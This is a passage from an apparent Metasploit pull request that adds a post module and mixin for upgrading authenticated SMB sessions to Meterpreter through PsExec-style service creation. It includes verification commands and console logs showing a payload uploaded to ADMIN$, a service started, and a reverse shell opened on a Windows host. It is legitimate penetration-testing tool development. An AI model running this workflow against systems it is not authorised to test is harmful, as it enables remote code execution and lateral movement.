+    context 'with valid session and LHOST' do
+      it 'executes the full upload and service creation flow' do
+        expect(simple_client).to receive(:connect).with("\\\\192.0.2.1\\ADMIN$")
+        expect(smb_client).to receive(:tree_connect).with("\\\\192.0.2.1\\IPC$")
+        subject.run
+      end
+    end
+  end
+end


### PR DESCRIPTION
## Description

Adds the ability to upgrade authenticated SMB sessions to Meterpreter sessions using PsExec techniques.

This PR introduces:
- **`post/windows/manage/smb_to_meterpreter`** — a new post module that uploads a service-wrapped EXE payload to ADMIN$, creates a Windows service via SVCCTL, and starts it to execute a Meterpreter reverse TCP payload.
- **`Msf::Post::SessionUpgrade`** — a reusable mixin that handles LHOST resolution (module datastore → framework datastore → session tunnel_local fallback), multi/handler lifecycle, payload generation, and wait-for-session polling. Consuming modules implement `execute_upgrade(lhost)` for delivery.
- **`sessions -u` routing** — the framework's session upgrade command now detects SMB sessions and routes them to the new module automatically, rather than attempting `shell_to_meterpreter`.
- **`Msf::Exploit::Retry#poll_until_truthy`** — a new fixed-interval polling helper alongside the existing `retry_until_truthy`. Polls a block at a consistent interval (default 1s) until it returns a truthy value or times out. Used by the upgrade mixin to wait for the new Meterpreter session.

Prior to this change, SMB sessions could not be upgraded to Meterpreter without manually configuring and running a separate exploit module.

**Related Issue:**
#21559 #20804 

## Breaking Changes

None

## Reviewer Notes

- The `SessionUpgrade` mixin is designed to be reusable for future session upgrade paths (e.g., SQL) — consuming modules only need to implement `execute_upgrade(lhost)`.
- The module includes a `check` method that verifies ADMIN$ access and SVCCTL pipe binding before exploitation.
- `PAYLOAD_OVERRIDE` is an advanced option consistent with `shell_to_meterpreter`'s naming. When not set, the module auto-selects based on `TARGET_ARCH`.
- The `core.rb` change forwards `LHOST`, `LPORT`, and `TARGET_ARCH` from the session's `exploit_datastore` — but not `PAYLOAD`, since the upgrade necessarily uses a different payload than what created the SMB session.
- `poll_until_truthy` is used in `wait_for_upgrade_session` to poll for the new Meterpreter session at 1-second intervals, providing a real integration exercise of the helper during normal `sessions -u` usage.

## Verification Steps

1. - [x] Start msfconsole
2. - [x] Obtain an authenticated SMB session (e.g., `use auxiliary/scanner/smb/smb_login` with `CreateSession true` against a Windows target with admin creds)
3. - [x] Run `sessions -u <smb_session_id>`
4. - [x] Verify the framework routes to `post/windows/manage/smb_to_meterpreter` and a Meterpreter session opens
5. - [x] Also: `use post/windows/manage/smb_to_meterpreter`, `set SESSION <id>`, `set LHOST <ip>`, `run`
6. - [x] Verify the service and uploaded EXE are cleaned up on the target (check ADMIN$ and services)
7. - [x] Run `check` on an SMB session and verify it returns `Appears` when admin access is available
8. - [x] Verify `poll_until_truthy` is exercised during session wait (observable via the "Waiting up to N seconds" status message followed by session detection)

## Test Evidence

SMB sessions were manually verified to upgrade to Meterpreter sessions successfully. Service and file cleanup confirmed on target.

### sessions -u <smb_session_id>

```msf
msf auxiliary(scanner/smb/smb_login) > sessions -u -1
[*] Executing 'post/windows/manage/smb_to_meterpreter' on session: [-1]
[!] SESSION may not be compatible with this module:
[!]  * Unknown session arch
[!]  * Unknown session platform. This module works with: Windows.
[*] Starting exploit/multi/handler on 10.15.200.61:4444
[*] Started reverse TCP handler on 10.15.200.61:4444
[*] Uploaded payload to \\172.16.158.182\ADMIN$\unFxBvVr.exe
[*] Bound to \svcctl
[*] Creating service BkAPktWzvIFv...
[*] Starting the service...
[*] Sending stage (248902 bytes) to 10.15.200.61
[+] Service started successfully
[!] Could not stop service 'BkAPktWzvIFv': Error returned when sending a control to the service: (0x00000426) ERROR_SERVICE_NOT_ACTIVE: The service has not been started.
[+] Service 'BkAPktWzvIFv' deleted successfully
[+] Deleted \\172.16.158.182\ADMIN$\unFxBvVr.exe
[*] Waiting up to 30 seconds for Meterpreter session...
[+] Meterpreter session opened successfully!
msf auxiliary(scanner/smb/smb_login) > [*] Meterpreter session 2 opened (10.15.200.61:4444 -> 10.15.200.61:64160) at 2026-06-18 13:13:07 +0100

msf auxiliary(scanner/smb/smb_login) > sessions -1
[*] Starting interaction with 2...

meterpreter > pwd
C:\Windows\system32
meterpreter >
```

### smb_to_meterpreter

```msf
msf post(windows/manage/smb_to_meterpreter) > run
[!] SESSION may not be compatible with this module:
[!]  * Unknown session arch
[!]  * Unknown session platform. This module works with: Windows.
[*] Starting exploit/multi/handler on 172.16.158.1:4444
[*] Started reverse TCP handler on 172.16.158.1:4444
[*] Uploaded payload to \\172.16.158.182\ADMIN$\kPjRNEHs.exe
[*] Bound to \svcctl
[*] Creating service gfAiBDOkmQDe...
[*] Starting the service...
[*] Sending stage (248902 bytes) to 172.16.158.182
[+] Service started successfully
[!] Could not stop service 'gfAiBDOkmQDe': Error returned when sending a control to the service: (0x00000426) ERROR_SERVICE_NOT_ACTIVE: The service has not been started.
[+] Service 'gfAiBDOkmQDe' deleted successfully
[+] Deleted \\172.16.158.182\ADMIN$\kPjRNEHs.exe
[*] Waiting up to 30 seconds for Meterpreter session...
[+] Meterpreter session opened successfully!
[*] Post module execution completed
msf post(windows/manage/smb_to_meterpreter) > [*] Meterpreter session 3 opened (172.16.158.1:4444 -> 172.16.158.182:49309) at 2026-06-18 13:15:39 +0100

msf post(windows/manage/smb_to_meterpreter) > sessions -1
[*] Starting interaction with 3...

meterpreter > pwd
C:\Windows\system32
meterpreter >
```

## Environment

| Field | Details |
|-------|---------|
| **Operating System** | macOS 26.5.1 |
| **Ruby Version** | 3.3.8 |
| **Target Software/Hardware** | Windows with SMB (port 445) and administrative credentials |

## AI Usage Disclosure

Kiro

## Pre-Submission Checklist

- [x] Ran [`rubocop`](https://docs.metasploit.com/docs/development/quality/using-rubocop.html) on new files with no new offenses _(net new files only)_
- [x] Ran [`msftidy`](https://docs.metasploit.com/docs/development/quality/msftidy.html) on changed module files with no new offenses _(modules only)_
- [x] Ran [`msftidy_docs`](https://docs.metasploit.com/docs/development/quality/writing-module-documentation.html#before-you-submit-your-pr-msftidy_docsrb) on changed documentation files with no new offenses _(documentation files only)_
- [x] Included a corresponding documentation markdown file in `documentation/modules` _(new modules only)_
- [x] No sensitive information (IP addresses, credentials, API keys, hashes) in code or documentation
- [x] Tested on the target environment specified in the Environment section above
- [x] Included RSpec tests for library changes _(encouraged for `lib/` changes)_
- [x] Read the [CONTRIBUTING.md](https://github.com/rapid7/metasploit-framework/blob/master/CONTRIBUTING.md) and [module acceptance guidelines](https://docs.metasploit.com/docs/development/maintainers/process/guidelines-for-accepting-modules-and-enhancements.html)